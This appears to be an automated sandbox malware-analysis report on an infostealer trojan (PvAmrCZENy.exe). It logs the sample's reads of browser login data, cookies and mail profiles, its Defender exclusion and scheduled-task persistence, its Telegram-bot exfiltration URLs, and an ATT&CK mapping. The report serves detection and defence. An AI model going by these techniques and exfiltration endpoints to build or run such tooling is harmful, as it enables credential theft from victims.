                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Users\user\Desktop\PvAmrCZENy.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Users\user\AppData\Roaming\yxXYABHh.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Users\user\AppData\Roaming\yxXYABHh.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\PvAmrCZENy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\yxXYABHh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 6120, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 7320, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.4149990.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.yxXYABHh.exe.3949970.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d93e00.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: yxXYABHh.exe PID: 5912, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                1
                Input Capture
                23
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager111
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets41
                Virtualization/Sandbox Evasion
                SSH1
                Input Capture
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631776 Sample: PvAmrCZENy.exe Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 49 reallyfreegeoip.org 2->49 51 api.telegram.org 2->51 53 2 other IPs or domains 2->53 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 81 15 other signatures 2->81 8 PvAmrCZENy.exe 7 2->8         started        12 yxXYABHh.exe 5 2->12         started        14 svchost.exe 2->14         started        signatures3 77 Tries to detect the country of the analysis system (by using the IP) 49->77 79 Uses the Telegram API (likely for C&C communication) 51->79 process4 dnsIp5 41 C:\Users\user\AppData\Roaming\yxXYABHh.exe, PE32 8->41 dropped 43 C:\Users\...\yxXYABHh.exe:Zone.Identifier, ASCII 8->43 dropped 45 C:\Users\user\AppData\Local\...\tmp4DA1.tmp, XML 8->45 dropped 47 C:\Users\user\AppData\...\PvAmrCZENy.exe.log, ASCII 8->47 dropped 83 Adds a directory exclusion to Windows Defender 8->83 17 powershell.exe 23 8->17         started        20 powershell.exe 23 8->20         started        22 PvAmrCZENy.exe 15 2 8->22         started        85 Antivirus detection for dropped file 12->85 87 Multi AV Scanner detection for dropped file 12->87 89 Injects a PE file into a foreign processes 12->89 25 yxXYABHh.exe 12->25         started        27 schtasks.exe 12->27         started        61 127.0.0.1 unknown unknown 14->61 file6 signatures7 process8 dnsIp9 63 Uses schtasks.exe or at.exe to add and modify task schedules 17->63 65 Loading BitLocker PowerShell Module 17->65 29 conhost.exe 17->29         started        31 conhost.exe 20->31         started        33 conhost.exe 20->33         started        35 schtasks.exe 1 20->35         started        37 WmiPrvSE.exe 20->37         started        55 checkip.dyndns.com 132.226.8.169, 49681, 49683, 49686 UTMEMUS United States 22->55 57 api.telegram.org 149.154.167.220, 443, 49716, 49720 TELEGRAMRU United Kingdom 22->57 59 reallyfreegeoip.org 104.21.96.1, 443, 49682, 49684 CLOUDFLARENETUS United States 22->59 67 Tries to steal Mail credentials (via file / registry access) 25->67 69 Tries to harvest and steal browser information (history, passwords, etc) 25->69 39 conhost.exe 27->39         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PvAmrCZENy.exe78%VirustotalBrowse
                PvAmrCZENy.exe71%ReversingLabsWin32.Trojan.Jalapeno
                PvAmrCZENy.exe100%AviraTR/Kryptik.jxxgz
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\yxXYABHh.exe100%AviraTR/Kryptik.jxxgz
                C:\Users\user\AppData\Roaming\yxXYABHh.exe71%ReversingLabsWin32.Trojan.Jalapeno
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://crl.mi0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.96.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              http://checkip.dyndns.org/false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002FA5000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F96000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
